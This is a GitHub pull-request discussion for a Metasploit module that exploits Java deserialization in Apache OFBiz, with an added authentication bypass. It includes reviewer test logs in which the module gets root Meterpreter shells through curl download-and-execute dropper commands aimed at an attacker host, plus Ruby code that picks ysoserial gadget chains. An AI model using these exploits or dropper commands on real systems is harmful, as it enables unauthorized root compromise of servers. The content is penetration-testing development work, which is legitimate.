Update apache_ofbiz_deserialization to include auth bypass #18681
Conversation
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
|
still a work in progress, got to implement a few more things here, but its close. |
jvoisin
reviewed
Jan 9, 2024
h00die
changed the title
jheysel-r7
reviewed
Jan 24, 2024
There was a problem hiding this comment.
Great addition @h00die tested on both versions, 15 and 18. Just one suggestion about notifying the user on the compatibility of the Ofbiz versions vs. module options.
Version 15.12
msf6 exploit(linux/http/apache_ofbiz_deserialization) > set AUTHBYPASS false
AUTHBYPASS => false
msf6 exploit(linux/http/apache_ofbiz_deserialization) > set rport 8443
rport => 8443
msf6 exploit(linux/http/apache_ofbiz_deserialization) > run
[*] Started reverse TCP handler on 172.16.199.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable. Target can deserialize arbitrary data.
[*] Executing Linux Dropper for linux/x64/meterpreter/reverse_tcp
[*] Using URL: http://172.16.199.1:7070/iVmk2ph
[+] Successfully executed command: curl -so /tmp/JXLKdNaG http://172.16.199.1:7070/iVmk2ph;chmod +x /tmp/JXLKdNaG;/tmp/JXLKdNaG;rm -f /tmp/JXLKdNaG
[*] Client 172.16.199.1 (curl/7.38.0) requested /iVmk2ph
[*] Sending payload to 172.16.199.1 (curl/7.38.0)
[*] Sending stage (3045380 bytes) to 172.16.199.1
[*] Command Stager progress - 100.00% done (112/112 bytes)
[*] Meterpreter session 4 opened (172.16.199.1:4444 -> 172.16.199.1:53036) at 2024-01-24 13:51:05 -0500
[*] Server stopped.
meterpreter > getuid
Server username: root
meterpreter > sysinfo
Computer : 172.17.0.2
OS : Debian 8.4 (Linux 6.5.11-linuxkit)
Architecture : x64
BuildTuple : x86_64-linux-musl
Meterpreter : x64/linux
meterpreter >
Version 18.12.09
msf6 exploit(linux/http/apache_ofbiz_deserialization) > set rport 8444
rport => 8444
msf6 exploit(linux/http/apache_ofbiz_deserialization) > set AUTHBYPASS true
AUTHBYPASS => true
msf6 exploit(linux/http/apache_ofbiz_deserialization) > run
[*] Started reverse TCP handler on 172.16.199.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[!] The service is running, but could not be validated. Apache OFBiz detected
[*] Executing Linux Dropper for linux/x64/meterpreter/reverse_tcp
[*] Using URL: http://172.16.199.1:7070/M7tWdG5ZpN
[+] Successfully executed command: curl -so /tmp/aTlzLzae http://172.16.199.1:7070/M7tWdG5ZpN;chmod +x /tmp/aTlzLzae;/tmp/aTlzLzae;rm -f /tmp/aTlzLzae
[*] Client 172.16.199.1 (curl/7.74.0) requested /M7tWdG5ZpN
[*] Sending payload to 172.16.199.1 (curl/7.74.0)
[*] Sending stage (3045380 bytes) to 172.16.199.1
[*] Command Stager progress - 100.00% done (115/115 bytes)
[*] Meterpreter session 3 opened (172.16.199.1:4444 -> 172.16.199.1:53012) at 2024-01-24 13:50:45 -0500
[*] Server stopped.
meterpreter > getuid
Server username: root
meterpreter > sysinfo
Computer : 172.17.0.3
OS : Debian 11.4 (Linux 6.5.11-linuxkit)
Architecture : x64
BuildTuple : x86_64-linux-musl
Meterpreter : x64/linux
meterpreter >
Comment on lines
126
to
138
| if datastore['AUTHBYPASS'] # assumes ~18.12 or so | ||
| res = send_request_xmlrpc( | ||
| # framework/webapp/lib/rome-0.9.jar | ||
| # used with 18.12 compatible, but not 15.12 compatible | ||
| generate_java_deserialization_for_command('CommonsBeanutils1', 'bash', cmd) # works against both | ||
| ) | ||
| else | ||
| res = send_request_xmlrpc( | ||
| # framework/webapp/lib/rome-0.9.jar | ||
| # used with 15.12, but not 18.12 compatible | ||
| generate_java_deserialization_for_command('ROME', 'bash', cmd) | ||
| ) | ||
| end |
There was a problem hiding this comment.
This is the only place where we explicitly outline the compatibility restraints of the version of Apache Ofbiz with the datastore['AUTHBYPASS'] option. I feel like we should be more vocal about this.
If you run the module with default options against a version 15 target the module reports that the exploitation was successful but no session is returned as the wrong gadget chain is used but is not communicated:
msf6 exploit(linux/http/apache_ofbiz_deserialization) > run
[*] Started HTTPS reverse handler on https://192.168.123.1:8443
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable. Target can deserialize arbitrary data.
[*] Executing Linux Dropper for linux/x64/meterpreter_reverse_https
[*] Using URL: http://192.168.123.1:7070/df9nSANH
[+] Successfully executed command: curl -so /tmp/GzJvAvQo http://192.168.123.1:7070/df9nSANH;chmod +x /tmp/GzJvAvQo;/tmp/GzJvAvQo;rm -f /tmp/GzJvAvQo
[*] Command Stager progress - 100.00% done (114/114 bytes)
[*] Server stopped.
[*] Exploit completed, but no session was created.
I think we should bail and notify the user if the module is running against version 15 with the datastore['AUTHBYPASS'] set to true (or running against 18 with the option set to false).
I think we could use the /webtools/control/xmlrpc endpoint to help with this - I know on Ofbiz 18 the version is displayed in the footer. Let me know what you think.
There was a problem hiding this comment.
i like the idea, i'll see if i can research it in a few days
There was a problem hiding this comment.
So I was able to find version 17.x, and it also includes the version at the bottom of the page. I'm not a java fan, so the thought of installing this app by hand is less than appealing to me. I think I'll code it in, if we get a 200, check and return version number, if not assume its <16.
|
I did a bit of re-structuring to remove the option all together. we now just version detect and auto select the appropriate route |
|
Thanks for the update @h00die, I like how you just all together removed the need for the Version 18.12Version 15.12 |
jheysel-r7
added
the
rn-modules
Release NotesThis PR updates the pre-existing apache_ofbiz_deserialization module to include functionality that will bypass authentication by using the newly discovered auth-bypass vulnerability: CVE-2023-51467. |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
Add this suggestion to a batch that can be applied as a single commit.
This suggestion is invalid because no changes were made to the code.
Suggestions cannot be applied while the pull request is closed.
Suggestions cannot be applied while viewing a subset of changes.
Only one suggestion per line can be applied in a batch.
Add this suggestion to a batch that can be applied as a single commit.
Applying suggestions on deleted lines is not supported.
You must change the existing code in this line in order to create a valid suggestion.
Outdated suggestions cannot be applied.
This suggestion has been applied or marked resolved.
Suggestions cannot be applied from pending reviews.
Suggestions cannot be applied on multi-line comments.
Suggestions cannot be applied while the pull request is queued to merge.
Suggestion cannot be applied right now. Please check back later.
fixes #18644
This PR updates
apache_ofbiz_deserializationto work with CVE-2023-49070, and CVE-2023-51467, an auth bypass on newer versions of OFBiz < 18.12.10. It also requires a different gadget chain for de-serialization.msfconsoleuse exploit/linux/http/apache_ofbiz_deserializationexploit